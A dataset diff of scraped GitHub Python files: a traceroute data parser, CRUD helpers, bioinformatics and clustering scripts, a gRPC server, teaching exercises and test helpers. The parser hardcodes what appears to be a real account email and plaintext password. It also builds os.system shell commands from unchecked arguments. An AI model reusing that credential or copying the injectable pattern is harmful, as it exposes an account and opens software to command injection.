diff --git "a/3679.jsonl" "b/3679.jsonl" new file mode 100644--- /dev/null +++ "b/3679.jsonl" @@ -0,0 +1,459 @@ +{"seq_id":"37487835896","text":"# import files\nimport sys\nimport os\nimport os.path\nimport urllib\nimport gzip\nfrom requests.auth import HTTPBasicAuth\nimport requests\nimport time\n\n\n# initialize node list\nnodelist = []\n\n\ndef parse(year, month, day):\n\n\tedgecount = 0\n\n\t# open nodelist file\n\tf = open(\"/home/jay/Trace/ark_nodes.txt\", \"r\")\n\n\t# read nodes into list\n\tfor item in f:\n\t\tnodelist.append(item)\n\tf.close()\n\n\t# re-initialize variables each time (clear)\n\ttrace = []\n\n\tall_trace = []\n\tunique_trace = set()\n\n\tall_ip = []\n\tunique_ip = set()\n\n\tedgeList = set()\n\n\tsrc = ''\n\tdst = ''\n\thop = ''\n\tip = ''\n\taddr = ''\n\n\tstarCounter = 1\n\tcount = 1\n\n\t# check for directories and create if necessary\n\tif not os.path.exists(\"/home/jay/Desktop/Trace_01/ArkData\"):\n\t\tos.makedirs(\"/home/jay/Desktop/Trace_01/ArkData\")\n\n\tif not os.path.exists(\"/home/jay/Desktop/Trace_01/ark-temp\"):\n\t\tos.makedirs(\"/home/jay/Desktop/Trace_01/ark-temp\")\n\n\t# open files for write\n\tout1 = open(\"/home/jay/Desktop/Trace_01/ArkData/all_trace_\" + month + '_' + day + '_' + year + \".txt\", \"w\")\n\tout2 = open(\"/home/jay/Desktop/Trace_01/ArkData/unique_trace_\" + month + '_' + day + '_' + year + \".txt\", \"w\")\n\tout3 = open(\"/home/jay/Desktop/Trace_01/ArkData/all_ip_\" + month + '_' + day + '_' + year + \".txt\", \"w\")\n\tout4 = open(\"/home/jay/Desktop/Trace_01/ArkData/unique_ip_\" + month + '_' + day + '_' + year + \".txt\", \"w\")\n\tout5 = open(\"/home/jay/Desktop/Trace_01/ArkData/unique_edge_\" + month + '_' + day + '_' + year + \".txt\", \"w\")\n\tout6 = open(\"/home/jay/Desktop/Trace_01/ArkData/stats_\" + month + '_' + day + '_' + year + \".txt\", \"w\")\n\n\t# iterate through each team\n\tfor x in range(1, 4):\n\n\t\t# cycle through each file for team/day\n\t\tfor item in nodelist:\n\n\t\t\t# remove carriage return\n\t\t\titem = item.strip('\\n')\n\n\t\t\t# retrieve file\t\t\t\n\t\t\tfilename = \"https://topo-data.caida.org/team-probing/list-7.allpref24/team-\" + str(x) + \"/daily/\" + year + \"/cycle-\" + year + month + day + \"/daily.l7.t1.c004642.\" + year + month + day + \".\" + item + \".warts.gz\"\n\n\t\t\t# fetch file with requests\n\t\t\tr = requests.get(filename, auth=(\"jthom@cse.unr.edu\", \"sherdnig3544\"))\n\n\t\t\t# open file for write\n\t\t\tf = open(\"/home/jay/Desktop/Trace_01/ark-temp/temp.gz\", \"wb\")\n\t\t\tfor chunk in r.iter_content(chunk_size=512 * 1024):\n\t\t\t\tif chunk:\n\t\t\t\t\tf.write(chunk)\n\t\t\tf.close()\n\n\t\t\t# use scamper to convert to text file\n\t\t\tos.system(\"zcat /home/jay/Desktop/Trace_01/ark-temp/temp.gz | sc_warts2text > /home/jay/Desktop/Trace_01/ark-temp/warts.txt\")\n\n\t\t\t# open textfile for read\n\t\t\tf = open(\"/home/jay/Desktop/Trace_01/ark-temp/warts.txt\", \"r\")\n\n\t\t\ttry:\n\t\t\t\t# iterate through each line\n\t\t\t\tfor line in f:\n\n\t\t\t\t\t# split line into pieces\n\t\t\t\t\tline = line.split()\n\n\t\t\t\t\t# build trace string (line not traceroute)\n\t\t\t\t\tif line[0] != 'traceroute':\n\t\t\t\t\t\thop = line[0]\n\t\t\t\t\t\tip = line[1]\n\n\t\t\t\t\t\tif ip == '*':\n\t\t\t\t\t\t\tip = '0'\n\n\t\t\t\t\t\t#addr = ip + '-' + hop + ' ' # changed this to make it easier for Abdullah to parse in C\n\t\t\t\t\t\taddr = ip + ',' + hop + 
'\\t'\t\t\t\t\t\t\n\t\t\t\t\t\ttrace.append(addr)\n\t\t\t\t\t\tall_ip.append(ip)\n\t\t\t\t\t\tunique_ip.add(ip)\n\n\t\t\t\t\t# reset and append running list each time line == traceroute\n\t\t\t\t\tif line[0] == 'traceroute':\n\n\t\t\t\t\t\t# get values for src, dst\n\t\t\t\t\t\tsrc = line[2]\n\t\t\t\t\t\tdst = line[4]\n\n\t\t\t\t\t\tif src == '*':\n\t\t\t\t\t\t\tsrc = '0'\n\n\t\t\t\t\t\tif dst == '*':\n\t\t\t\t\t\t\tdst = '0'\n\n\t\t\t\t\t\tall_ip.append(src)\n\t\t\t\t\t\tall_ip.append(dst)\n\t\t\t\t\t\tunique_ip.add(src)\n\t\t\t\t\t\tunique_ip.add(dst)\n\n\t\t\t\t\t\t# check for empty list and append if good\n\t\t\t\t\t\tif not trace:\n\t\t\t\t\t\t\tpass\n\t\t\t\t\t\telse:\n\n\t\t\t\t\t\t\t# eliminate trailing '*'s\n\t\t\t\t\t\t\twhile '0' in trace[-1]:\n\t\t\t\t\t\t\t\tdel(trace[-1])\n\n\t\t\t\t\t\t\t# convert list to string\n\t\t\t\t\t\t\ttrace = ''.join(trace)\n\n\t\t\t\t\t\t\t# append string to running lists\n\t\t\t\t\t\t\tall_trace.append(trace)\n\t\t\t\t\t\t\tunique_trace.add(trace)\n\n\t\t\t\t\t\t# reset trace\n\t\t\t\t\t\ttrace = []\n\n\t\t\t\t\t\t# append src, dst to new trace\n\t\t\t\t\t\t#trace.append(src + ':' + dst + ' ') # changed this to make it easier for Abdullah to parse in C\n\t\t\t\t\t\ttrace.append(src + ':' + dst + '\\t')\t\t\t\t\t\t\n\n\t\t\texcept:\n\t\t\t\tpass\n\n\t\t\t# once more at end to catch last trace\n\t\t\ttry:\n\t\t\t\t# eliminate trailing '*'s\n\t\t\t\twhile '0' in trace[-1]:\n\t\t\t\t\tdel(trace[-1])\n\n\t\t\t\t# convert list to string\n\t\t\t\ttrace = ''.join(trace)\n\n\t\t\t\t# append string to running lists\n\t\t\t\tall_trace.append(trace)\n\t\t\t\tunique_trace.add(trace)\n\t\t\texcept:\n\t\t\t\tpass\n\n\t\t\tf.close()\n\n\t\t\t#except:\n\t\t\t\t#print (\"url does not exist\")\n\n\n\n\t# find edges...\n\t# iterate through unique traces\n\tfor item in unique_trace:\n\n\t\t# set list so it will reset\n\t\ttrace = []\n\n\t\t# split trace and push to list\n\t\t#for item in item.split(): # changed this to make it easier for Abdullah to parse in C\n\t\tfor item in item.split('\\t'):\t\t\n\t\t\tif (':' in item):\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\t#item = item.split('-') # changed this to make it easier for Abdullah to parse in C\n\t\t\t\titem = item.split(',')\t\t\t\t\n\t\t\t\ttrace.append(item[0])\n\n\t\t# find length of list\n\t\tlength = len(trace)\n\n\t\t# set iterator variable so it will reset\n\t\ti = 0\n\n\t\t# iterate through trace list for pairs\n\t\twhile i < length - 1:\n\t\t\tfirst = trace[i]\n\t\t\tsecond = trace[i+1]\n\n\t\t\t# set incrementing value for 0's\n\t\t\tif first == '0' and second == '0':\n\t\t\t\t# don't count 0 - 0\n\t\t\t\tpass\n\n\t\t\telse:\n\n\t\t\t\tif first == '0':\n\t\t\t\t\tfirst = count\n\t\t\t\t\tcount += 1\n\n\t\t\t\tif second == '0':\n\t\t\t\t\tsecond = count\n\t\t\t\t\tcount += 1\n\n\t\t\t# add to edgeList set (unique values only)\n\t\t\t#edgeList.add(str(first) + ' ' + str(second)) # changed this to make it easier for Abdullah to parse in C\n\t\t\tedgeList.add(str(first) + '\\t' + str(second))\t\t\t\n\t\t\ti += 1\n\n\n\t# write all_trace to file\n\tfor item in all_trace:\n\t\tout1.write(item)\n\t\tout1.write('\\n')\n\n\t# write unique_trace to file\n\tfor item in unique_trace:\n\t\tout2.write(item)\n\t\tout2.write('\\n')\n\n\t# write all_ip to file\n\tfor item in all_ip:\n\t\tout3.write(item)\n\t\tout3.write('\\n')\n\n\t# write unique_ip to file\n\tfor item in unique_ip:\n\t\tout4.write(item)\n\t\tout4.write('\\n')\n\n\t# write edgelist to file\n\tfor item in 
edgeList:\n\t\tout5.write(item)\n\t\tout5.write('\\n')\n\n\t\titem = item.split('\\t')\t\t\t\n\n\t\tif (('.' in item[0]) and ('.' in item[1])):\n\t\t\tedgecount += 1\n\n\t# write stats\n\tout6.write(\"Total IP: \" + str(len(all_ip)) + '\\n')\n\tout6.write(\"Unique IP: \" + str(len(unique_ip)) + '\\n')\n\tout6.write(\"Total Trace: \" + str(len(all_trace)) + '\\n')\n\tout6.write(\"Unique Trace: \" + str(len(unique_trace)) + '\\n')\n\tout6.write(\"Unique Edge: \" + str(edgecount) + '\\n')\n\n\t# close files\n\tout1.close()\n\tout2.close()\n\tout3.close()\n\tout4.close()\n\tout5.close()\n\tout6.close()\n\n\ndef main(argv):\n\n\t# get day from command line args\n\tyear = sys.argv[1]\n\tmonth = sys.argv[2]\n\tday = sys.argv[3]\n\t\n\tstart = time.time()\n\n\t# run parse\n\tparse(year, month, day)\n\n\t# trace count\n\tos.system(\"./ark_tracecount \" + year + ' ' + month + ' ' + day)\n\n\t# ip count\n\tos.system(\"./ark_ipcount \" + year + ' ' + month + ' ' + day)\n\n\tend = time.time()\n\n\twith open(\"log.txt\", \"a\") as f:\n\t\tf.write(\"Ark:\" + '\\t' + \"Start-Time-\" + month + '_' + day + '_' + year + '\\t' + \"Runtime (minutes)-\" + str((end - start)/60) + '\\n')\n\n\n\nif __name__ == '__main__':\n main(sys.argv)\n","repo_name":"spitfire4040/Trace","sub_path":"arkparse.py","file_name":"arkparse.py","file_ext":"py","file_size_in_byte":6968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38292175527","text":"from sqlalchemy.orm import Session\nfrom typing import Union\n\nfrom .. import models, schemas\n\n\ndef create_asset(db: Session, asset: schemas.AssetCreate, portfolio_id: int) -> Union[models.Asset, None]:\n # get portfolio that has the same title and currency\n db_asset = db.query(models.Asset).filter(\n models.Asset.portfolio_id == portfolio_id, \n models.Asset.currency_id == asset.currency_id).first()\n\n # if the asset already exists then raise an error\n if db_asset is not None:\n return None\n\n db_asset = models.Asset(**asset.dict(), portfolio_id=portfolio_id)\n db.add(db_asset) \n db.commit()\n db.refresh(db_asset)\n return db_asset\n\n\ndef update_asset(db: Session, asset: schemas.AssetUpdate, portfolio_id: int) -> Union[models.Asset, None]:\n db_asset = db.query(models.Asset).filter(models.Asset.portfolio_id == portfolio_id, models.Asset.id == asset.id).first()\n if db_asset is None:\n return None\n\n db_asset.amount = asset.amount\n db.commit()\n db.refresh(db_asset)\n return db_asset\n\n\ndef delete_asset(db: Session, portfolio_id: int, asset_id: int) -> int:\n status = db.query(models.Asset).filter(models.Asset.portfolio_id == portfolio_id, models.Asset.id == asset_id).delete()\n db.commit()\n return status","repo_name":"fidesy/crypto-tracker","sub_path":"crypto_tracker/crud/asset.py","file_name":"asset.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13696461879","text":"import numpy as np\nimport pandas as pd\nimport scipy, sys, sklearn.decomposition\nimport statsmodels.api as sm\nimport functions\n\nfrom plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot\nfrom plotly.graph_objs import *\n\n#Read in data, data will contain the gene expression file, annotations contains the metadata, genes contains gene metadata. It is annoying that it is spread over many files.. 
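\n#The three tables get merged below so sample annotations gain platform labels and genes gain platform variance fractions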
\n\ndata = pd.read_csv('/Users/pwangel/Downloads/myeloid_atlas_expression_v7.1.tsv', sep='\\t', index_col=0)\nannotations = pd.read_csv('/Users/pwangel/Downloads/myeloid_atlas_samples_v7.1.tsv', sep='\\t', index_col=0)\nannotations_platform = pd.read_csv('/Users/pwangel/PlotlyWorkspace/combine_data/blood/outputs_for_front_end/iMac_annotations.tsv', sep='\\t', index_col=0) ### Need to get the platform separately from this file\nannotations = annotations.merge(annotations_platform['Platform_Category'], how='inner', left_index=True, right_index=True)\n\ngenes_s4m = pd.read_csv('/Users/pwangel/Downloads/myeloid_atlas_genes_v7.1.tsv', sep='\\t', index_col=0)\ngenes_varPart = pd.read_csv('/Users/pwangel/Downloads/myeloid_atlas_genes.tsv', sep='\\t', index_col=0)\ngenes = genes_s4m.merge(genes_varPart['Platform_VarFraction'], how='left', left_index=True, right_index=True) # Want genes to have a platform variance fraction plus ensembl-gene symbol conversion\n\ncut_data = functions.transform_to_percentile(data.loc[genes.loc[genes.inclusion.values].index.values.astype(str), annotations.index.values])\nall_ranked_data = functions.transform_to_percentile(data.loc[:, annotations.index.values])\nannotations['Cluster'] = 1 #Dummy values for the categories of samples we will compare\n\n#Generate the atlas PCA and use it to remove samples that are not part of the DE\npca = sklearn.decomposition.PCA(n_components=3, svd_solver='full')\npca_coords = pca.fit_transform(cut_data.transpose())\nannotations = annotations.loc[pca_coords[:,0] < 0]\nall_ranked_data = all_ranked_data[annotations.index]\ncut_data = cut_data[annotations.index]\n\n#Folder to output p values and graphs into.\nfname = 'macrophage_tissues'\nfolder = 'macrophage_tissues'\n\ncluster_names = []\nsample_ids = []\n\n# Create a list of sample types and the ids for each category of interest. 
It is unnecessary to do it this way now, but there was a reason I did it like this previous (it's not worth refactoring either).\nfor i_cluster, i_categories in zip([1,2,3], [[['macrophage', 'colon'], ['macrophage', 'ascites - ovarian cancer']], \\\n [['macrophage', 'lung'], ['macrophage', 'synovium']], \\\n [['macrophage', 'blood'], ['kupffer cell', 'liver'], ['microglia', 'brain']]]):\n\n sample_types = []\n\n for i_sample_type in i_categories:\n sample_types.append(i_sample_type[0]+'_'+i_sample_type[1])\n sel_samples = (annotations['Cell Type'].values==i_sample_type[0]) & (annotations.Tissue.values==i_sample_type[1])\n sample_ids.append(annotations.loc[sel_samples].index.values)\n annotations.loc[sel_samples, 'Cluster'] = i_cluster\n \n print(i_sample_type, \"N samples = %d\" %annotations.loc[sel_samples].shape[0])\n print(\"Sample platforms = \", np.unique(annotations.loc[sel_samples].Platform_Category.values))\n print(\"N per respective platform = \", np.unique(annotations.loc[sel_samples].Platform_Category.values, return_counts=True)[1])\n\n cluster_names.append('/'.join(sample_types))\n\n#Narrow down data to only samples of interest\nannotations = annotations.loc[np.concatenate(sample_ids)]\ncut_data = cut_data[np.concatenate(sample_ids)]\ncut_unfiltered_data = all_ranked_data[np.concatenate(sample_ids)]\n\ngene_list = genes.symbol.values[~pd.isnull(genes.symbol.values) & genes.inclusion]\n\npvals = np.array([])\ndelta_median = np.array([])\n\n# Create dataframe to output results into\n# Also keeping track of the mean/std of each category\ndf_output = pd.DataFrame(index=gene_list, columns=np.append(np.append(cluster_names, [i+' Mean' for i in cluster_names]), [i+' Std' for i in cluster_names]))\n\n#Loop through the sample types and genes to find differentially expressed genes\nfor i_gene in gene_list:\n\n for i_cluster, cluster_name in zip([1,2,3], cluster_names):\n\n ensembl_id = genes.index.values[genes.symbol.values==i_gene]\n\n # If the gene is in the filtered data\n\n if ensembl_id in cut_data.index.values:\n \n ranks_of_sample = cut_data.loc[ensembl_id, annotations.Cluster.values==i_cluster].values\n ranks_not_sample = cut_data.loc[ensembl_id, (annotations.Cluster.values!=i_cluster)].values\n \n pvals = np.append(pvals, scipy.stats.mannwhitneyu(ranks_of_sample.flatten(), ranks_not_sample.flatten(), alternative='two-sided')[1])\n delta_median = np.append(delta_median, np.abs(np.median(ranks_of_sample)-np.median(ranks_not_sample)))\n\n # If the gene is not in the filtered data. 
We want to plot all the genes\n\n else:\n\n ranks_of_sample = cut_unfiltered_data.loc[ensembl_id, annotations.Cluster.values==i_cluster].values\n ranks_not_sample = cut_unfiltered_data.loc[ensembl_id, (annotations.Cluster.values!=i_cluster)].values\n \n pvals = np.append(pvals, scipy.stats.mannwhitneyu(ranks_of_sample.flatten(), ranks_not_sample.flatten(), alternative='two-sided')[1])\n delta_median = np.append(delta_median, np.abs(np.median(ranks_of_sample)-np.median(ranks_not_sample)))\n\n df_output.loc[i_gene, cluster_name+' Mean'] = ranks_of_sample.mean()\n df_output.loc[i_gene, cluster_name+' Std'] = ranks_of_sample.std()\n\n\n#Correct for multiple testing\n#corrected_pvals = sm.stats.fdrcorrection(pvals)\ncorrected_pvals = sm.stats.multipletests(pvals, alpha=0.05, method='bonferroni', is_sorted=False, returnsorted=False)\n\n#Loop through again and place into dataframe\ni_pval = 0\n\nfor i_gene in gene_list:\n\n for i_cluster, cluster_name in zip([1,2,3], cluster_names):\n\n ensembl_id = genes.index.values[genes.symbol.values==i_gene]\n\n df_output.loc[i_gene, cluster_name] = corrected_pvals[1][i_pval]\n\n i_pval += 1 \n\ndf_output.loc[~df_output.iloc[:,0].isnull()].to_csv('/Users/pwangel/PlotlyWorkspace/iMac_plots/%s/%s_pvals.tsv' %(folder, fname), sep='\\t')\n\n#Plot a dot plot for each gene\n\nimport seaborn as sns\nimport matplotlib.pyplot as pyplot\nsns.set(style=\"ticks\")\n\nfor i_gene in gene_list:\n\n ensembl_id = genes.index.values[genes.symbol.values==i_gene]\n df_violin = pd.DataFrame(columns=['Expression', 'Cell Property', 'Cell Colour'])\n platform_std = (np.sqrt(genes.Platform_VarFraction.values)*all_ranked_data.std(axis=1).values)[genes.symbol.values==i_gene][0]\n platform_mean = all_ranked_data.loc[ensembl_id].mean(axis=1)[0]\n\n for i_cluster, cluster_name in zip([1,2,3], cluster_names):\n\n i_sample_ids = (annotations.Cluster.values==i_cluster)\n if genes.loc[genes.symbol.values==i_gene].inclusion.values: \n i_type_vals = cut_data.loc[ensembl_id, i_sample_ids].values.flatten().astype(float)\n else:\n i_type_vals = all_ranked_data.loc[ensembl_id, i_sample_ids].values.flatten().astype(float)\n\n tier1_vals = np.full(shape=i_type_vals.shape[0], fill_value=cluster_name)\n df_violin = df_violin.append(pd.DataFrame(columns=['Expression', 'Cell Property'], data = np.array([i_type_vals, tier1_vals]).transpose()), ignore_index=True)\n\n df_violin.Expression = df_violin.Expression.astype(float)\n\n\n fig, ax = pyplot.subplots(1,1, figsize=(13.5,7.0))\n ax = sns.swarmplot(x=\"Cell Property\", y=\"Expression\", size=9, order = cluster_names, color='blue', data=df_violin)\n\n ax.fill_between(x=[ax.get_xlim()[0], ax.get_xlim()[1]], y1=platform_mean-platform_std, y2=platform_mean+platform_std, color='lightgrey', alpha=0.5)\n\n pyplot.ylabel(i_gene+' Expression')\n pyplot.ylim(0.0, 1.0)\n #pyplot.show()\n pyplot.savefig('/Users/pwangel/PlotlyWorkspace/iMac_plots/%s/%s/%s.eps' %(folder, fname,i_gene))\n ax.remove()\n pyplot.close()\n\n\n\n","repo_name":"wellslab/pauls_atlas_building","sub_path":"notebooks_and_scripts/ranksum_DE_examples/macrophage_tissue_DE.py","file_name":"macrophage_tissue_DE.py","file_ext":"py","file_size_in_byte":8116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75367254248","text":"import numpy as np\nfrom scipy.special import comb\n\ndef ari(X,Y):\n\tkX = len(X)\n\tkY = len(Y)\n\ta = np.array(list(map(len, X)))\n\tb = np.array(list(map(len, Y)))\n\tn = a.sum()\n\tassert b.sum() == n\n\tXs = 
np.zeros((kX, n))\n\tYs = np.zeros((n, kY))\n\tfor i, clX in enumerate(X):\n\t\telems = np.arange(n)\n\t\tXs[i, :] = np.isin(elems, clX)\n\tfor j, clY in enumerate(Y):\n\t\telems = np.arange(n)\n\t\tYs[:, j] = np.isin(elems, clY)\n\tN = np.matmul(Xs, Ys)\n\tnum1 = comb(N, 2).sum()\n\tnum2 = comb(a, 2).sum() * comb(b, 2).sum() / comb(n, 2)\n\tden1 = 0.5 * ( comb(a, 2).sum() + comb(b, 2).sum() ) \n\tden2 = ( comb(a,2).sum() * comb(b,2).sum() ) / comb(n, 2)\n\treturn (num1 - num2) / (den1 - den2)\n\ndef misclustered_vertices(X, Y):\n\tkX = len(X)\n\tkY = len(Y)\n\tassert kX == kY\n\tk = kX\n\tk_ = np.arange(k)\n\tfrom itertools import permutations\n\tfrom itertools import chain\n\tmin_misclass = float('inf')\n\tfrom tqdm import tqdm as tqdm\n\tprint('checking permutations for misclustered vertices')\n\tfor perm in tqdm(permutations(k_)):\n\t\tmiscl_verts = sum(sum([[[x for x in X[c] if not(x in Y[perm[c]])], [y for y in Y[perm[c]] if not(y in X[c])]] for c in k_], []), [])\n\t\tmiscl_verts = len(np.unique(miscl_verts))\n\t\tmin_misclass = min(min_misclass, miscl_verts)\n\treturn min_misclass\n","repo_name":"dks28/PartII_Project","sub_path":"src/testing/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30379589017","text":"from concurrent import futures\nimport logging\n\nimport grpc\nimport QuadraticEquation_pb2\nimport QuadraticEquation_pb2_grpc\n\nfrom QuadraticEquation import quadraticEquation\n\n\nclass QuadraticEquationServicer(QuadraticEquation_pb2_grpc.QuadraticEquationServicer):\n\n def quadraticEquation(self, request, context):\n # Takes in 3 requested values as parameters\n a = request.a\n b = request.b\n c = request.c\n\n # Returns response as solution identified in .proto file\n response = QuadraticEquation_pb2.Solution()\n\n # Checks functions result then sends back response to client\n result = quadraticEquation(a, b, c)\n if result == None:\n response.x1 = \"The answer does not exist.\"\n response.x2 = \"The answer does not exist.\"\n else:\n response.x1 = result[0]\n response.x2 = result[1]\n return response\n\ndef serve():\n port = \"50051\"\n server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))\n QuadraticEquation_pb2_grpc.add_QuadraticEquationServicer_to_server(\n QuadraticEquationServicer(), server)\n server.add_insecure_port(\"[::]:\" + port)\n server.start()\n print(\"Server started, listening on \" + port)\n server.wait_for_termination()\n\n\nif __name__ == \"__main__\":\n logging.basicConfig()\n serve()\n","repo_name":"Ryan-Richardson11/AdvancedProgrammingConcepts","sub_path":"Week2/Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23228737802","text":"# ------------------------------------------------------------\n# Clase que representa personas:\nclass Persona:\n def __init__(self, cedula, nombre, apellido):\n self.cedula = cedula\n self.nombre = nombre\n self.apellido = apellido\n\n def __str__(self):\n return f'({self.cedula}) {self.apellido}, {self.nombre} '\n\n# ------------------------------------------------------------\n# Clase quel representa destrezas de la Persona\nclass Destreza:\n def __init__(self, area, herramienta, experiencia):\n self.area = area\n self.herramienta = herramienta\n self.experiencia = experiencia\n\n def __str__(self):\n return f'{self.area} 
{self.herramienta} {self.experiencia}'\n\n# ------------------------------------------------------------\n# Clase que hereda de Persona y Destreza\nclass Jefe(Persona, Destreza):\n def __init__(self, cedula, nombre, apellido, area, herramienta, experiencia, grupo):\n # Invoca al constructor de clase Persona\n Persona.__init__(self, cedula, nombre, apellido)\n # Invoca al constructor de clase Destreza\n Destreza.__init__(self, area, herramienta, experiencia)\n # Nuevos atributos\n self.grupo = grupo\n\n def __str__(self):\n cadena = f\"{self.cedula}: {self.nombre} {self.apellido},\\nArea: '{self.area}', \\nHerramienta: {self.herramienta}, \\nGrupo: {self.grupo}\"\n return cadena\n\n\n# ------------------------------------------------------------\n# Bloque principal\n# ------------------------------------------------------------\nprint(\"\\033[H\\033[J\") # Limpiamos la pantalla \n \nprint(\"-\"*30)\npersona1 = Persona(123456789, 'Juan', 'Perez')\nprint(\"Persona1:\")\nprint(persona1)\nprint(\"-\"*30)\n\ndestreza1 = Destreza('Programacion', 'Python', 'Experto')\nprint(\"Destreza1:\")\nprint(destreza1)\nprint(\"-\"*30)\n\njefe1 = Jefe(123456789, 'Ana', 'Jaurez', 'Diseño', 'Interfaz', 'Junior', '1')\nprint(\"Jefe1:\")\nprint(jefe1)\nprint(\"-\"*30)\n\n","repo_name":"King-Zalogon/CODO-Python-Fullstack-2023","sub_path":"Python/Clase31-Python7/04-Herencia_Multiple.py","file_name":"04-Herencia_Multiple.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2477846404","text":"from inspect import getfullargspec\n\n\ndef run(self, output):\n \"\"\"Execute the plot contained in the PostPlot object and save it to save_path\n\n Parameters\n ----------\n self : PostPlot\n A PostPlot object\n output : Output\n an Output object\n\n \"\"\"\n\n list_names = self.method.split(\".\")\n\n if len(list_names) == 1:\n # Getting the name of the plot method of the output or the object given by attribute\n plot_method = getattr(output, self.method)\n else:\n # Find object which contains the plot method if attribute is not None\n obj = output\n\n # Get successive objects to reach the one containing the method\n for i in range(len(list_names) - 1):\n obj = getattr(obj, list_names[i])\n\n # Getting the name of the plot method of the output or the object given by attribute\n plot_method = getattr(obj, list_names[-1])\n\n # Path to save the figure if save_path is not already in param_dict and is an argument of the plot method\n if (\n \"save_path\" not in self.param_dict\n and \"save_path\" in getfullargspec(plot_method)[5]\n ):\n # Get path of results folder in the Output\n result_path = output.get_path_result()\n\n # Check in case format begins with a \".\"\n if self.save_format[0] == \".\":\n str_format = self.save_format\n else:\n str_format = \".\" + self.save_format\n\n # Build save_path of the picture\n self.param_dict[\"save_path\"] = result_path + \"/\" + self.name + str_format\n\n # Execute plot method\n plot_method(\n *self.param_list,\n **self.param_dict,\n )\n","repo_name":"gverez/pyleecan","sub_path":"pyleecan/Methods/Post/PostPlot/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"15836986231","text":"#filename:client_real.py\n#function: client using\n#step1: create socket\n#step2: connect to server\n\nimport socket # for socket\nimport sys\nPORT=80 #default port for socket\n\n#step1: 
create socket\ntry:\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n print( \"Socket successfully created\")\nexcept socket.error as err:\n print (\"socket creation failed with error %s\" %(err))\n\ntry:\n host_ip = socket.gethostbyname('www.google.com')\nexcept socket.gaierror:\n print (\"there was an error resolving the host\")\n sys.exit()\n\n#step2: connect to the server\ns.connect((host_ip,PORT))\n\nprint (\"socket connected to google IP == %s\" %(host_ip))\n# receive data from the server\ntry:\n# recv_msg=s.recv(1024)\n recv_msg=s.write(\"test\")\nexcept:\n print(\"\\n receiving error\")\nelse:\n print(recv_msg)\ns.close() \n","repo_name":"Scott-S-Lin/Python_Programming_ChineseBook","sub_path":"ch12/client_real.py","file_name":"client_real.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11328137452","text":"class Node:\n def __init__(self, value):\n self.info = value\n self.next = None\n\nclass SLLaddOne:\n def __init__(self):\n self.head = None\n \n \n def traversal(self):\n if self.head == None:\n print(\"\\nList is Empty !\")\n return \n \n print(\"\\nList is: \", end = \" \")\n p = self.head\n while p != None:\n print(p.info, end = \" \")\n p = p.next\n print(\"\\n\")\n \n\n def append(self, data):\n new = Node(data)\n if self.head == None:\n self.head = new\n return\n \n p = self.head\n while p.next != None:\n p = p.next\n p.next = new\n \n\n def create_list(self):\n num = int(input(\"\\nEnter the Number of Nodes: \"))\n if num == 0:\n return\n \n print(\"\\nEnter the values for the Nodes: \")\n for i in range(num):\n i = int(input())\n self.append(i)\n\n \n def reverse_list(self):\n p = self.head\n r = None\n while p != None:\n q = p.next\n p.next = r\n r = p\n p = q\n self.head = r\n \n \n def adding_one(self):\n if self.head == None:\n print(\"\\nList is Empty !\")\n return\n add = SLLaddOne()\n self.reverse_list()\n \n carry = 0\n sum = self.head.info+1\n if sum >= 10:\n carry = 1\n rem = sum % 10\n add.append(rem)\n else:\n carry = 0\n add.append(sum)\n\n p = self.head.next\n while p != None:\n sum = p.info+carry\n if sum >= 10:\n carry = 1\n rem = sum % 10\n if p.next == None and p.info == 9:\n c = 0\n new = Node(c)\n p.next = new\n add.append(rem)\n else:\n add.append(rem)\n else:\n carry = 0\n add.append(sum)\n p = p.next\n add.reverse_list()\n return add\n \n\n\nif __name__ == \"__main__\":\n objct = SLLaddOne()\n objct.create_list()\n\n print(\"\\n-------------------- Single Linked List --------------------\\n\")\n\n while(True):\n print(\"\\n\\n1. Display the List.\")\n print(\"2. Append Nodes.\")\n print(\"3. Addition of One at Last Node.\")\n print(\"4. 
Quit.\")\n\n option = int(input(\"\\nEnter the preferred option: \"))\n\n if option == 1:\n objct.traversal()\n elif option == 2:\n data = int(input(\"\\nEnter the new value: \"))\n objct.append(data)\n print(\"\\nInsertion done check the Updated List.\")\n elif option == 3:\n sum1 = objct.adding_one()\n sum1.traversal()\n #print(\"\\nAddition done check the updated List.\")\n elif option == 4:\n print(\"\\nThank You for your time !\")\n break\n else:\n print(\"\\nWrong input please try again !\")\n \n print(\"\\n\")\n","repo_name":"maxkashyap41/pythonDSA","sub_path":"Linked List/SingleLinkedList_adding_one.py","file_name":"SingleLinkedList_adding_one.py","file_ext":"py","file_size_in_byte":3092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32157294347","text":"from Base import launchPage\nfrom Base import page_actions\nfrom Libraries import configRead\nfrom Assersions import alerts_n_modals_Assersions\nimport time\n\nclass Alert_and_modals_Class():\n\n def __init__(self, objdriver, objwait):\n global driver\n global wait\n driver = objdriver\n wait= objwait\n\n def click_Alerts_Menu(self):\n launchPage.click_menu(driver,\"Alerts\",\"alerts_modal_Menu_xpath\")\n\n def click_window_popup_modal_SubMenu(self):\n launchPage.click_submenu(driver,\"Alerts\",\"window_popup_modal_SubMenu_xpath\")\n\n def click_facebook_like_button(self):\n 